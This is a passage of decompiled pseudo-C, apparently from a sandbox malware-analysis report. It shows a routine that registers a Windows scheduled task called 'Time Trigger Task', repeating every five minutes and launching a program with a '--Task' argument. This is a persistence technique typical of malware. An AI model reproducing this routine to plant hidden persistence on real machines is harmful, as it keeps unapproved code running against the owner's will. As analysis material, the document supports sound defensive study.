                                                                                    				void* _v52;
                                                                                    				void* _v56;
                                                                                    				void* _v60;
                                                                                    				void* _v64;
                                                                                    				void* _v68;
                                                                                    				void* _v72;
                                                                                    				void* _v76;
                                                                                    				void* _v80;
                                                                                    				char _v92;
                                                                                    				void* _v96;
                                                                                    				char _v100;
                                                                                    				char _v104;
                                                                                    				short _v120;
                                                                                    				char _v140;
                                                                                    				char _v156;
                                                                                    				char _v172;
                                                                                    				char _v228;
                                                                                    				char _v244;
                                                                                    				char _v324;
                                                                                    				long _v1348;
                                                                                    				void* __ebx;
                                                                                    				void* __edi;
                                                                                    				void* __esi;
                                                                                    				intOrPtr _t222;
                                                                                    				short _t226;
                                                                                    				short _t243;
                                                                                    				intOrPtr* _t248;
                                                                                    				intOrPtr* _t249;
                                                                                    				intOrPtr* _t250;
                                                                                    				short _t251;
                                                                                    				intOrPtr* _t253;
                                                                                    				intOrPtr* _t254;
                                                                                    				intOrPtr* _t255;
                                                                                    				intOrPtr* _t258;
                                                                                    				short _t259;
                                                                                    				intOrPtr* _t261;
                                                                                    				intOrPtr* _t263;
                                                                                    				intOrPtr* _t265;
                                                                                    				intOrPtr* _t267;
                                                                                    				intOrPtr* _t268;
                                                                                    				intOrPtr* _t269;
                                                                                    				short _t270;
                                                                                    				intOrPtr* _t273;
                                                                                    				short _t274;
                                                                                    				intOrPtr* _t275;
                                                                                    				short _t276;
                                                                                    				intOrPtr* _t278;
                                                                                    				short _t279;
                                                                                    				intOrPtr* _t280;
                                                                                    				short _t281;
                                                                                    				intOrPtr* _t283;
                                                                                    				intOrPtr* _t285;
                                                                                    				intOrPtr* _t286;
                                                                                    				intOrPtr* _t287;
                                                                                    				short _t288;
                                                                                    				intOrPtr* _t291;
                                                                                    				short _t292;
                                                                                    				intOrPtr* _t293;
                                                                                    				short _t294;
                                                                                    				intOrPtr* _t296;
                                                                                    				short _t297;
                                                                                    				intOrPtr* _t299;
                                                                                    				intOrPtr* _t301;
                                                                                    				intOrPtr* _t302;
                                                                                    				intOrPtr* _t303;
                                                                                    				short _t304;
                                                                                    				intOrPtr* _t306;
                                                                                    				intOrPtr* _t307;
                                                                                    				intOrPtr* _t308;
                                                                                    				short _t309;
                                                                                    				intOrPtr* _t311;
                                                                                    				intOrPtr* _t313;
                                                                                    				intOrPtr* _t314;
                                                                                    				intOrPtr* _t315;
                                                                                    				short _t316;
                                                                                    				intOrPtr* _t318;
                                                                                    				intOrPtr* _t319;
                                                                                    				intOrPtr* _t320;
                                                                                    				short _t321;
                                                                                    				void* _t327;
                                                                                    				intOrPtr* _t332;
                                                                                    				intOrPtr* _t333;
                                                                                    				intOrPtr* _t334;
                                                                                    				intOrPtr* _t335;
                                                                                    				short _t336;
                                                                                    				intOrPtr* _t340;
                                                                                    				short _t341;
                                                                                    				intOrPtr* _t342;
                                                                                    				short _t343;
                                                                                    				intOrPtr* _t345;
                                                                                    				short _t346;
                                                                                    				intOrPtr* _t350;
                                                                                    				intOrPtr* _t351;
                                                                                    				short _t352;
                                                                                    				intOrPtr* _t354;
                                                                                    				intOrPtr* _t355;
                                                                                    				intOrPtr* _t356;
                                                                                    				short _t357;
                                                                                    				intOrPtr* _t365;
                                                                                    				intOrPtr* _t378;
                                                                                    				intOrPtr* _t380;
                                                                                    				intOrPtr* _t382;
                                                                                    				intOrPtr* _t386;
                                                                                    				intOrPtr* _t388;
                                                                                    				intOrPtr* _t390;
                                                                                    				intOrPtr* _t392;
                                                                                    				void* _t394;
                                                                                    				char _t395;
                                                                                    				intOrPtr* _t397;
                                                                                    				intOrPtr* _t398;
                                                                                    				intOrPtr* _t402;
                                                                                    				intOrPtr* _t410;
                                                                                    				intOrPtr* _t417;
                                                                                    				intOrPtr* _t420;
                                                                                    				intOrPtr* _t423;
                                                                                    				intOrPtr* _t428;
                                                                                    				intOrPtr* _t431;
                                                                                    				intOrPtr* _t433;
                                                                                    				intOrPtr* _t454;
                                                                                    				intOrPtr* _t457;
                                                                                    				intOrPtr* _t459;
                                                                                    				intOrPtr* _t466;
                                                                                    				intOrPtr* _t469;
                                                                                    				short _t479;
                                                                                    				short _t480;
                                                                                    				short _t484;
                                                                                    				short _t491;
                                                                                    				short _t499;
                                                                                    				short _t500;
                                                                                    				short _t501;
                                                                                    				short _t502;
                                                                                    				short _t504;
                                                                                    				intOrPtr* _t511;
                                                                                    				short _t512;
                                                                                    				short _t513;
                                                                                    				void* _t516;
                                                                                    				void* _t517;
                                                                                    				void* _t519;
                                                                                    				intOrPtr* _t540;
                                                                                    				short _t541;
                                                                                    				short _t542;
                                                                                    				intOrPtr _t543;
                                                                                    				void* _t544;
                                                                                    
                                                                                    				_t222 =  *[fs:0x0];
                                                                                    				 *[fs:0x0] = _t543;
                                                                                    				_t544 = _t543 - 0x538;
                                                                                    				_t517 = __ecx;
                                                                                    				_v8 = 0;
                                                                                    				__imp__CoInitialize(0, _t516, _t519, _t394, _t222, 0x4ca928, 0xffffffff); // executed
                                                                                    				if(_t222 >= 0) {
                                                                                    					__imp__CoInitializeSecurity(0, 0xffffffff, 0, 0, 6, 3, 0, 0, 0); // executed
                                                                                    					_v100 = 7;
                                                                                    					_v120 = 0;
                                                                                    					_v104 = 0;
                                                                                    					E00414690(_t394,  &_v120,  &_a4, 0);
                                                                                    					_t226 =  &_v32;
                                                                                    					_v8 = 1;
                                                                                    					_v32 = 0;
                                                                                    					__imp__CoCreateInstance(0x4d506c, 0, 1, 0x4d4fec, _t226, 0xffffffff); // executed
                                                                                    					__eflags = _t226;
                                                                                    					if(_t226 < 0) {
                                                                                    						L74:
                                                                                    						__imp__CoUninitialize();
                                                                                    						_t395 = 0;
                                                                                    					} else {
                                                                                    						_t397 = __imp__#8;
                                                                                    						 *_t397( &_v156);
                                                                                    						asm("movdqu xmm0, [ebp-0x98]");
                                                                                    						asm("movdqu [ebp-0xb8], xmm0");
                                                                                    						 *_t397( &_v140);
                                                                                    						asm("movdqu xmm0, [ebp-0x88]");
                                                                                    						asm("movdqu [ebp-0xc8], xmm0");
                                                                                    						 *_t397( &_v172);
                                                                                    						asm("movdqu xmm0, [ebp-0xa8]");
                                                                                    						asm("movdqu [ebp-0xd8], xmm0");
                                                                                    						 *_t397( &_v244);
                                                                                    						_v8 = 5;
                                                                                    						asm("movdqu xmm0, [ebp-0xb8]");
                                                                                    						_t402 = _v32;
                                                                                    						asm("movdqu [eax], xmm0");
                                                                                    						asm("movdqu xmm0, [ebp-0xc8]");
                                                                                    						asm("movdqu [eax], xmm0");
                                                                                    						_t544 = _t544 - 0xffffffffffffffe0;
                                                                                    						asm("movdqu xmm0, [ebp-0xd8]");
                                                                                    						asm("movdqu [eax], xmm0");
                                                                                    						asm("movdqu xmm0, [ebp-0xf0]");
                                                                                    						asm("movdqu [eax], xmm0"); // executed
                                                                                    						_t243 =  *((intOrPtr*)( *_t402 + 0x28))(_t402);
                                                                                    						__imp__#9( &_v244);
                                                                                    						__imp__#9( &_v172);
                                                                                    						__imp__#9( &_v140);
                                                                                    						_v8 = 1;
                                                                                    						__imp__#9( &_v156);
                                                                                    						__eflags = _t243;
                                                                                    						if(__eflags >= 0) {
                                                                                    							_v24 = 0;
                                                                                    							_t248 = E0040B140(_t397,  &_v28, __eflags, "\\");
                                                                                    							_v8 = 6;
                                                                                    							_t249 =  *_t248;
                                                                                    							__eflags = _t249;
                                                                                    							if(_t249 == 0) {
                                                                                    								_t479 = 0;
                                                                                    								__eflags = 0;
                                                                                    							} else {
                                                                                    								_t479 =  *_t249;
                                                                                    							}
                                                                                    							_t250 = _v32;
                                                                                    							_t251 =  *((intOrPtr*)( *_t250 + 0x1c))(_t250, _t479,  &_v24);
                                                                                    							_v8 = 1;
                                                                                    							E0040B1D0( &_v28, _t479);
                                                                                    							__eflags = _t251;
                                                                                    							if(__eflags >= 0) {
                                                                                    								_t253 = E0040B140(_t397,  &_v28, __eflags, L"Time Trigger Task");
                                                                                    								_v8 = 7;
                                                                                    								_t254 =  *_t253;
                                                                                    								__eflags = _t254;
                                                                                    								if(_t254 == 0) {
                                                                                    									_t480 = 0;
                                                                                    									__eflags = 0;
                                                                                    								} else {
                                                                                    									_t480 =  *_t254;
                                                                                    								}
                                                                                    								_t255 = _v24;
                                                                                    								 *((intOrPtr*)( *_t255 + 0x3c))(_t255, _t480, 0);
                                                                                    								_v8 = 1;
                                                                                    								E0040B1D0( &_v28, _t480);
                                                                                    								_t258 = _v32;
                                                                                    								_v20 = 0;
                                                                                    								_t259 =  *((intOrPtr*)( *_t258 + 0x24))(_t258, 0,  &_v20);
                                                                                    								_t410 = _v32;
                                                                                    								 *((intOrPtr*)( *_t410 + 8))(_t410);
                                                                                    								__eflags = _t259;
                                                                                    								if(_t259 >= 0) {
                                                                                    									_t261 = _v20;
                                                                                    									_v64 = 0;
                                                                                    									__eflags =  *((intOrPtr*)( *_t261 + 0x1c))(_t261,  &_v64);
                                                                                    									if(__eflags < 0) {
                                                                                    										L73:
                                                                                    										_t263 = _v24;
                                                                                    										 *((intOrPtr*)( *_t263 + 8))(_t263);
                                                                                    										_t265 = _v20;
                                                                                    										 *((intOrPtr*)( *_t265 + 8))(_t265);
                                                                                    										goto L74;
                                                                                    									} else {
                                                                                    										_t267 = E0040B140(_t397,  &_v28, __eflags, L"Author Name");
                                                                                    										_v8 = 8;
                                                                                    										_t268 =  *_t267;
                                                                                    										__eflags = _t268;
                                                                                    										if(_t268 == 0) {
                                                                                    											_t484 = 0;
                                                                                    											__eflags = 0;
                                                                                    										} else {
                                                                                    											_t484 =  *_t268;
                                                                                    										}
                                                                                    										_t269 = _v64;
                                                                                    										_t270 =  *((intOrPtr*)( *_t269 + 0x28))(_t269, _t484);
                                                                                    										_v8 = 1;
                                                                                    										E0040B1D0( &_v28, _t484);
                                                                                    										_t417 = _v64;
                                                                                    										 *((intOrPtr*)( *_t417 + 8))(_t417);
                                                                                    										__eflags = _t270;
                                                                                    										if(_t270 < 0) {
                                                                                    											goto L73;
                                                                                    										} else {
                                                                                    											_t273 = _v20;
                                                                                    											_v56 = 0;
                                                                                    											_t274 =  *((intOrPtr*)( *_t273 + 0x3c))(_t273,  &_v56);
                                                                                    											__eflags = _t274;
                                                                                    											if(_t274 < 0) {
                                                                                    												goto L73;
                                                                                    											} else {
                                                                                    												_t275 = _v56;
                                                                                    												_t276 =  *((intOrPtr*)( *_t275 + 0x38))(_t275, 3);
                                                                                    												_t420 = _v56;
                                                                                    												 *((intOrPtr*)( *_t420 + 8))(_t420);
                                                                                    												__eflags = _t276;
                                                                                    												if(_t276 < 0) {
                                                                                    													goto L73;
                                                                                    												} else {
                                                                                    													_t278 = _v20;
                                                                                    													_v48 = 0;
                                                                                    													_t279 =  *((intOrPtr*)( *_t278 + 0x2c))(_t278,  &_v48);
                                                                                    													__eflags = _t279;
                                                                                    													if(_t279 < 0) {
                                                                                    														goto L73;
                                                                                    													} else {
                                                                                    														_t280 = _v48;
                                                                                    														_t281 =  *((intOrPtr*)( *_t280 + 0x58))(_t280, 0xffffffff);
                                                                                    														_t423 = _v48;
                                                                                    														 *((intOrPtr*)( *_t423 + 8))(_t423);
                                                                                    														__eflags = _t281;
                                                                                    														if(_t281 < 0) {
                                                                                    															goto L73;
                                                                                    														} else {
                                                                                    															_t283 = _v48;
                                                                                    															_v76 = 0;
                                                                                    															__eflags =  *((intOrPtr*)( *_t283 + 0x9c))(_t283,  &_v76);
                                                                                    															if(__eflags < 0) {
                                                                                    																goto L73;
                                                                                    															} else {
                                                                                    																_t285 = E0040B140(_t397,  &_v28, __eflags, L"PT5M");
                                                                                    																_v8 = 9;
                                                                                    																_t286 =  *_t285;
                                                                                    																__eflags = _t286;
                                                                                    																if(_t286 == 0) {
                                                                                    																	_t491 = 0;
                                                                                    																	__eflags = 0;
                                                                                    																} else {
                                                                                    																	_t491 =  *_t286;
                                                                                    																}
                                                                                    																_t287 = _v76;
                                                                                    																_t288 =  *((intOrPtr*)( *_t287 + 0x28))(_t287, _t491);
                                                                                    																_v8 = 1;
                                                                                    																E0040B1D0( &_v28, _t491);
                                                                                    																_t428 = _v76;
                                                                                    																 *((intOrPtr*)( *_t428 + 8))(_t428);
                                                                                    																__eflags = _t288;
                                                                                    																if(_t288 < 0) {
                                                                                    																	goto L73;
                                                                                    																} else {
                                                                                    																	_t291 = _v20;
                                                                                    																	_v80 = 0;
                                                                                    																	_t292 =  *((intOrPtr*)( *_t291 + 0x24))(_t291,  &_v80);
                                                                                    																	__eflags = _t292;
                                                                                    																	if(_t292 < 0) {
                                                                                    																		goto L73;
                                                                                    																	} else {
                                                                                    																		_t293 = _v80;
                                                                                    																		_v68 = 0;
                                                                                    																		_t294 =  *((intOrPtr*)( *_t293 + 0x28))(_t293, 1,  &_v68);
                                                                                    																		_t431 = _v80;
                                                                                    																		 *((intOrPtr*)( *_t431 + 8))(_t431);
                                                                                    																		__eflags = _t294;
                                                                                    																		if(_t294 < 0) {
                                                                                    																			goto L73;
                                                                                    																		} else {
                                                                                    																			_t296 = _v68;
                                                                                    																			_v40 = 0;
                                                                                    																			_t297 =  *((intOrPtr*)( *_t296))(_t296, 0x4d50ec,  &_v40);
                                                                                    																			_t433 = _v68;
                                                                                    																			 *((intOrPtr*)( *_t433 + 8))(_t433);
                                                                                    																			__eflags = _t297;
                                                                                    																			if(_t297 < 0) {
                                                                                    																				goto L73;
                                                                                    																			} else {
                                                                                    																				_t299 = _v40;
                                                                                    																				__eflags =  *((intOrPtr*)( *_t299 + 0x28))(_t299,  &_v60);
                                                                                    																				if(__eflags < 0) {
                                                                                    																					goto L73;
                                                                                    																				} else {
                                                                                    																					_t301 = E0040B140(_t397,  &_v28, __eflags, L"PT5M");
                                                                                    																					_v8 = 0xa;
                                                                                    																					_t302 =  *_t301;
                                                                                    																					__eflags = _t302;
                                                                                    																					if(_t302 == 0) {
                                                                                    																						_t499 = 0;
                                                                                    																						__eflags = 0;
                                                                                    																					} else {
                                                                                    																						_t499 =  *_t302;
                                                                                    																					}
                                                                                    																					_t303 = _v60;
                                                                                    																					_t304 =  *((intOrPtr*)( *_t303 + 0x20))(_t303, _t499);
                                                                                    																					_v8 = 1;
                                                                                    																					E0040B1D0( &_v28, _t499);
                                                                                    																					__eflags = _t304;
                                                                                    																					if(__eflags < 0) {
                                                                                    																						goto L73;
                                                                                    																					} else {
                                                                                    																						_t306 = E0040B140(_t397,  &_v28, __eflags, 0x500078);
                                                                                    																						_v8 = 0xb;
                                                                                    																						_t307 =  *_t306;
                                                                                    																						__eflags = _t307;
                                                                                    																						if(_t307 == 0) {
                                                                                    																							_t500 = 0;
                                                                                    																							__eflags = 0;
                                                                                    																						} else {
                                                                                    																							_t500 =  *_t307;
                                                                                    																						}
                                                                                    																						_t308 = _v60;
                                                                                    																						_t309 =  *((intOrPtr*)( *_t308 + 0x28))(_t308, _t500);
                                                                                    																						_v8 = 1;
                                                                                    																						E0040B1D0( &_v28, _t500);
                                                                                    																						__eflags = _t309;
                                                                                    																						if(_t309 < 0) {
                                                                                    																							goto L73;
                                                                                    																						} else {
                                                                                    																							_t311 = _v40;
                                                                                    																							__eflags =  *((intOrPtr*)( *_t311 + 0x2c))(_t311, _v60);
                                                                                    																							if(__eflags < 0) {
                                                                                    																								goto L73;
                                                                                    																							} else {
                                                                                    																								_t313 = E0040B140(_t397,  &_v28, __eflags, L"Trigger1");
                                                                                    																								_v8 = 0xc;
                                                                                    																								_t314 =  *_t313;
                                                                                    																								__eflags = _t314;
                                                                                    																								if(_t314 == 0) {
                                                                                    																									_t501 = 0;
                                                                                    																									__eflags = 0;
                                                                                    																								} else {
                                                                                    																									_t501 =  *_t314;
                                                                                    																								}
                                                                                    																								_t315 = _v40;
                                                                                    																								_t316 =  *((intOrPtr*)( *_t315 + 0x24))(_t315, _t501);
                                                                                    																								_v8 = 1;
                                                                                    																								E0040B1D0( &_v28, _t501);
                                                                                    																								__eflags = _t316;
                                                                                    																								if(__eflags < 0) {
                                                                                    																									goto L73;
                                                                                    																								} else {
                                                                                    																									_t318 = E0040B140(_t397,  &_v28, __eflags, L"2030-05-02T08:00:00");
                                                                                    																									_v8 = 0xd;
                                                                                    																									_t319 =  *_t318;
                                                                                    																									__eflags = _t319;
                                                                                    																									if(_t319 == 0) {
                                                                                    																										_t502 = 0;
                                                                                    																										__eflags = 0;
                                                                                    																									} else {
                                                                                    																										_t502 =  *_t319;
                                                                                    																									}
                                                                                    																									_t320 = _v40;
                                                                                    																									_t321 =  *((intOrPtr*)( *_t320 + 0x44))(_t320, _t502);
                                                                                    																									_v8 = 1;
                                                                                    																									E0040B1D0( &_v28, _t502);
                                                                                    																									__eflags = _t321;
                                                                                    																									if(__eflags < 0) {
                                                                                    																										goto L73;
                                                                                    																									} else {
                                                                                    																										E00423AAF( &_v28, _t502, __eflags,  &_v92);
                                                                                    																										asm("cdq");
                                                                                    																										_v92 = _v92 + _t517;
                                                                                    																										asm("adc [ebp-0x54], edx"); // executed
                                                                                    																										_t327 = E00423551( &_v92); // executed
                                                                                    																										E004228E0( &_v324, 0x50, "%Y-%m-%dT%H:%M:%S", _t327);
                                                                                    																										_v33 = 0;
                                                                                    																										E00412C40(_t544, _t517,  &_v324);
                                                                                    																										_t332 = E00412900( &_v228, _v33);
                                                                                    																										_t544 = _t544 + 0x18;
                                                                                    																										_v8 = 0xe;
                                                                                    																										__eflags =  *((intOrPtr*)(_t332 + 0x14)) - 8;
                                                                                    																										if(__eflags >= 0) {
                                                                                    																											_t332 =  *_t332;
                                                                                    																										}
                                                                                    																										_t333 = E0040B140(_t397,  &_v28, __eflags, _t332);
                                                                                    																										_v8 = 0xf;
                                                                                    																										_t334 =  *_t333;
                                                                                    																										__eflags = _t334;
                                                                                    																										if(_t334 == 0) {
                                                                                    																											_t504 = 0;
                                                                                    																											__eflags = 0;
                                                                                    																										} else {
                                                                                    																											_t504 =  *_t334;
                                                                                    																										}
                                                                                    																										_t335 = _v40;
                                                                                    																										_t336 =  *((intOrPtr*)( *_t335 + 0x3c))(_t335, _t504);
                                                                                    																										E0040B1D0( &_v28, _t504);
                                                                                    																										_v8 = 1;
                                                                                    																										E00413210( &_v228);
                                                                                    																										_t454 = _v40;
                                                                                    																										 *((intOrPtr*)( *_t454 + 8))(_t454);
                                                                                    																										__eflags = _t336;
                                                                                    																										if(_t336 < 0) {
                                                                                    																											goto L73;
                                                                                    																										} else {
                                                                                    																											_t340 = _v20;
                                                                                    																											_v52 = 0;
                                                                                    																											_t341 =  *((intOrPtr*)( *_t340 + 0x44))(_t340,  &_v52);
                                                                                    																											__eflags = _t341;
                                                                                    																											if(_t341 < 0) {
                                                                                    																												goto L73;
                                                                                    																											} else {
                                                                                    																												_t342 = _v52;
                                                                                    																												_v72 = 0;
                                                                                    																												_t343 =  *((intOrPtr*)( *_t342 + 0x30))(_t342, 0,  &_v72);
                                                                                    																												_t457 = _v52;
                                                                                    																												 *((intOrPtr*)( *_t457 + 8))(_t457);
                                                                                    																												__eflags = _t343;
                                                                                    																												if(_t343 < 0) {
                                                                                    																													goto L73;
                                                                                    																												} else {
                                                                                    																													_t345 = _v72;
                                                                                    																													_v44 = 0;
                                                                                    																													_t346 =  *((intOrPtr*)( *_t345))(_t345, 0x4d511c,  &_v44);
                                                                                    																													_t459 = _v72;
                                                                                    																													 *((intOrPtr*)( *_t459 + 8))(_t459);
                                                                                    																													__eflags = _t346;
                                                                                    																													if(_t346 < 0) {
                                                                                    																														goto L73;
                                                                                    																													} else {
                                                                                    																														__eflags = _v100 - 8;
                                                                                    																														_t349 =  >=  ? _v120 :  &_v120;
                                                                                    																														_t350 = E0040B140(_t397,  &_v28, _v100 - 8,  >=  ? _v120 :  &_v120);
                                                                                    																														_v8 = 0x10;
                                                                                    																														_t511 =  *_t350;
                                                                                    																														__eflags = _t511;
                                                                                    																														if(_t511 == 0) {
                                                                                    																															_t512 = 0;
                                                                                    																															__eflags = 0;
                                                                                    																														} else {
                                                                                    																															_t512 =  *_t511;
                                                                                    																														}
                                                                                    																														_t351 = _v44;
                                                                                    																														_t352 =  *((intOrPtr*)( *_t351 + 0x2c))(_t351, _t512);
                                                                                    																														_v8 = 1;
                                                                                    																														E0040B1D0( &_v28, _t512);
                                                                                    																														__eflags = _t352;
                                                                                    																														if(__eflags >= 0) {
                                                                                    																															_t354 = E0040B140(_t397,  &_v28, __eflags, L"--Task");
                                                                                    																															_v8 = 0x11;
                                                                                    																															_t355 =  *_t354;
                                                                                    																															__eflags = _t355;
                                                                                    																															if(_t355 == 0) {
                                                                                    																																_t513 = 0;
                                                                                    																																__eflags = 0;
                                                                                    																															} else {
                                                                                    																																_t513 =  *_t355;
                                                                                    																															}
                                                                                    																															_t356 = _v44;
                                                                                    																															_t357 =  *((intOrPtr*)( *_t356 + 0x34))(_t356, _t513);
                                                                                    																															_v8 = 1;
                                                                                    																															_t539 = _t357;
                                                                                    																															E0040B1D0( &_v28, _t513);
                                                                                    																															_t466 = _v44;
                                                                                    																															 *((intOrPtr*)( *_t466 + 8))(_t466);
                                                                                    																															__eflags = _t357;
                                                                                    																															if(_t357 < 0) {
                                                                                    																																goto L73;
                                                                                    																															} else {
                                                                                    																																_v96 = 0;
                                                                                    																																E0040B400( &_v172, _t539, _t466);
                                                                                    																																asm("movdqu xmm0, [eax]");
                                                                                    																																asm("movdqu [ebp-0xd8], xmm0");
                                                                                    																																 *_t397( &_v140);
                                                                                    																																asm("movdqu xmm0, [ebp-0x88]");
                                                                                    																																asm("movdqu [ebp-0xc8], xmm0");
                                                                                    																																 *_t397( &_v156);
                                                                                    																																_v8 = 0x14;
                                                                                    																																asm("movdqu xmm0, [ebp-0x98]");
                                                                                    																																asm("movdqu [ebp-0xb8], xmm0");
                                                                                    																																_t365 = E0040B140(_t397,  &_v28, __eflags, L"Time Trigger Task");
                                                                                    																																_v8 = 0x15;
                                                                                    																																_t540 =  *_t365;
                                                                                    																																__eflags = _t540;
                                                                                    																																if(_t540 == 0) {
                                                                                    																																	_t541 = 0;
                                                                                    																																	__eflags = 0;
                                                                                    																																} else {
                                                                                    																																	_t541 =  *_t540;
                                                                                    																																}
                                                                                    																																asm("movdqu xmm0, [ebp-0xd8]");
                                                                                    																																_t469 = _v24;
                                                                                    																																asm("movdqu [eax], xmm0");
                                                                                    																																_t544 = _t544 - 0xfffffffffffffff0;
                                                                                    																																asm("movdqu xmm0, [ebp-0xc8]");
                                                                                    																																asm("movdqu [eax], xmm0");
                                                                                    																																asm("movdqu xmm0, [ebp-0xb8]");
                                                                                    																																asm("movdqu [eax], xmm0");
                                                                                    																																_t542 =  *((intOrPtr*)( *_t469 + 0x44))(_t469, _t541, _v20, 6, 3,  &_v96);
                                                                                    																																E0040B1D0( &_v28,  *_t469);
                                                                                    																																_t398 = __imp__#9;
                                                                                    																																 *_t398( &_v156);
                                                                                    																																 *_t398( &_v140);
                                                                                    																																_v8 = 1;
                                                                                    																																 *_t398( &_v172);
                                                                                    																																__eflags = _t542;
                                                                                    																																if(_t542 >= 0) {
                                                                                    																																	_t378 = _v24;
                                                                                    																																	 *((intOrPtr*)( *_t378 + 8))(_t378);
                                                                                    																																	_t380 = _v20;
                                                                                    																																	 *((intOrPtr*)( *_t380 + 8))(_t380);
                                                                                    																																	_t382 = _v96;
                                                                                    																																	 *((intOrPtr*)( *_t382 + 8))(_t382);
                                                                                    																																	__imp__CoUninitialize(); // executed
                                                                                    																																	_t395 = 1;
                                                                                    																																} else {
                                                                                    																																	swprintf( &_v1348, 0x400, "RegisterTaskDefinition. Err: %X\n", _t542);
                                                                                    																																	_t544 = _t544 + 0x10;
                                                                                    																																	goto L73;
                                                                                    																																}
                                                                                    																															}
                                                                                    																														} else {
                                                                                    																															_t386 = _v44;
                                                                                    																															 *((intOrPtr*)( *_t386 + 8))(_t386);
                                                                                    																															goto L73;
                                                                                    																														}
                                                                                    																													}
                                                                                    																												}
                                                                                    																											}
                                                                                    																										}
                                                                                    																									}
                                                                                    																								}
                                                                                    																							}
                                                                                    																						}
                                                                                    																					}
                                                                                    																				}
                                                                                    																			}
                                                                                    																		}
                                                                                    																	}
                                                                                    																}
                                                                                    															}
                                                                                    														}
                                                                                    													}
                                                                                    												}
                                                                                    											}
                                                                                    										}
                                                                                    									}
                                                                                    								} else {
                                                                                    									_t388 = _v24;
                                                                                    									 *((intOrPtr*)( *_t388 + 8))(_t388);
                                                                                    									__imp__CoUninitialize();
                                                                                    									_t395 = 0;
                                                                                    								}
                                                                                    							} else {
                                                                                    								_t390 = _v32;
                                                                                    								 *((intOrPtr*)( *_t390 + 8))(_t390);
                                                                                    								__imp__CoUninitialize();
                                                                                    								_t395 = 0;
                                                                                    							}
                                                                                    						} else {
                                                                                    							_t392 = _v32;
                                                                                    							 *((intOrPtr*)( *_t392 + 8))(_t392);
                                                                                    							__imp__CoUninitialize();
                                                                                    							_t395 = 0;
                                                                                    						}
                                                                                    					}
                                                                                    					__eflags = _v100 - 8;
                                                                                    					if(_v100 >= 8) {
                                                                                    						L00422587(_v120);
                                                                                    						_t544 = _t544 + 4;
                                                                                    					}
                                                                                    					__eflags = 0;
                                                                                    					_v100 = 7;
                                                                                    					_v104 = 0;
                                                                                    					_v120 = 0;
                                                                                    				} else {
                                                                                    					_t395 = 0;
                                                                                    				}
                                                                                    				if(_a24 >= 8) {
                                                                                    					L00422587(_a4);
                                                                                    				}
                                                                                    				 *[fs:0x0] = _v16;
                                                                                    				return _t395;
                                                                                    			}

                                                                                    0x0040d8a9
                                                                                    0x0040d8ab
                                                                                    0x0040d8b1
                                                                                    0x0040d8b1
                                                                                    0x0040d8ad
                                                                                    0x0040d8ad
                                                                                    0x0040d8ad
                                                                                    0x0040d8b3
                                                                                    0x0040d8ba
                                                                                    0x0040d8c0
                                                                                    0x0040d8c6
                                                                                    0x0040d8cb
                                                                                    0x0040d8cd
                                                                                    0x0040d8e5
                                                                                    0x0040d8ea
                                                                                    0x0040d8ee
                                                                                    0x0040d8f0
                                                                                    0x0040d8f2
                                                                                    0x0040d8f8
                                                                                    0x0040d8f8
                                                                                    0x0040d8f4
                                                                                    0x0040d8f4
                                                                                    0x0040d8f4
                                                                                    0x0040d8fa
                                                                                    0x0040d901
                                                                                    0x0040d907
                                                                                    0x0040d90b
                                                                                    0x0040d90d
                                                                                    0x0040d912
                                                                                    0x0040d918
                                                                                    0x0040d91b
                                                                                    0x0040d91d
                                                                                    0x00000000
                                                                                    0x0040d923
                                                                                    0x0040d92a
                                                                                    0x0040d931
                                                                                    0x0040d936
                                                                                    0x0040d941
                                                                                    0x0040d949
                                                                                    0x0040d94b
                                                                                    0x0040d95a
                                                                                    0x0040d962
                                                                                    0x0040d964
                                                                                    0x0040d96b
                                                                                    0x0040d978
                                                                                    0x0040d980
                                                                                    0x0040d985
                                                                                    0x0040d989
                                                                                    0x0040d98b
                                                                                    0x0040d98d
                                                                                    0x0040d993
                                                                                    0x0040d993
                                                                                    0x0040d98f
                                                                                    0x0040d98f
                                                                                    0x0040d98f
                                                                                    0x0040d995
                                                                                    0x0040d99d
                                                                                    0x0040d9b0
                                                                                    0x0040d9b6
                                                                                    0x0040d9b9
                                                                                    0x0040d9c1
                                                                                    0x0040d9c7
                                                                                    0x0040d9d4
                                                                                    0x0040d9e0
                                                                                    0x0040d9e2
                                                                                    0x0040d9e7
                                                                                    0x0040d9f4
                                                                                    0x0040d9fd
                                                                                    0x0040da05
                                                                                    0x0040da0a
                                                                                    0x0040da0c
                                                                                    0x0040da0e
                                                                                    0x0040da46
                                                                                    0x0040da4c
                                                                                    0x0040da4f
                                                                                    0x0040da55
                                                                                    0x0040da58
                                                                                    0x0040da5e
                                                                                    0x0040da61
                                                                                    0x0040da67
                                                                                    0x0040da10
                                                                                    0x0040da22
                                                                                    0x0040da27
                                                                                    0x00000000
                                                                                    0x0040da27
                                                                                    0x0040da0e
                                                                                    0x0040d8cf
                                                                                    0x0040d8cf
                                                                                    0x0040d8d5
                                                                                    0x00000000
                                                                                    0x0040d8d5
                                                                                    0x0040d8cd
                                                                                    0x0040d889
                                                                                    0x0040d85e
                                                                                    0x0040d835
                                                                                    0x0040d819
                                                                                    0x0040d76e
                                                                                    0x0040d731
                                                                                    0x0040d6f4
                                                                                    0x0040d6e0
                                                                                    0x0040d6a3
                                                                                    0x0040d666
                                                                                    0x0040d651
                                                                                    0x0040d626
                                                                                    0x0040d5fd
                                                                                    0x0040d5e1
                                                                                    0x0040d59b
                                                                                    0x0040d57c
                                                                                    0x0040d55e
                                                                                    0x0040d542
                                                                                    0x0040d524
                                                                                    0x0040d508
                                                                                    0x0040d496
                                                                                    0x0040d496
                                                                                    0x0040d49c
                                                                                    0x0040d49f
                                                                                    0x0040d4a5
                                                                                    0x0040d4a5
                                                                                    0x0040d426
                                                                                    0x0040d426
                                                                                    0x0040d42c
                                                                                    0x0040d42f
                                                                                    0x0040d435
                                                                                    0x0040d435
                                                                                    0x0040d3cc
                                                                                    0x0040d3cc
                                                                                    0x0040d3d2
                                                                                    0x0040d3d5
                                                                                    0x0040d3db
                                                                                    0x0040d3db
                                                                                    0x0040d3ca
                                                                                    0x0040da69
                                                                                    0x0040da6d
                                                                                    0x0040da72
                                                                                    0x0040da77
                                                                                    0x0040da77
                                                                                    0x0040da7a
                                                                                    0x0040da7c
                                                                                    0x0040da83
                                                                                    0x0040da8a
                                                                                    0x0040d276
                                                                                    0x0040d276
                                                                                    0x0040d276
                                                                                    0x0040da92
                                                                                    0x0040da97
                                                                                    0x0040da9c
                                                                                    0x0040daa6
                                                                                    0x0040dab1

                                                                                    APIs
                                                                                    • CoInitialize.OLE32(00000000), ref: 0040D26C
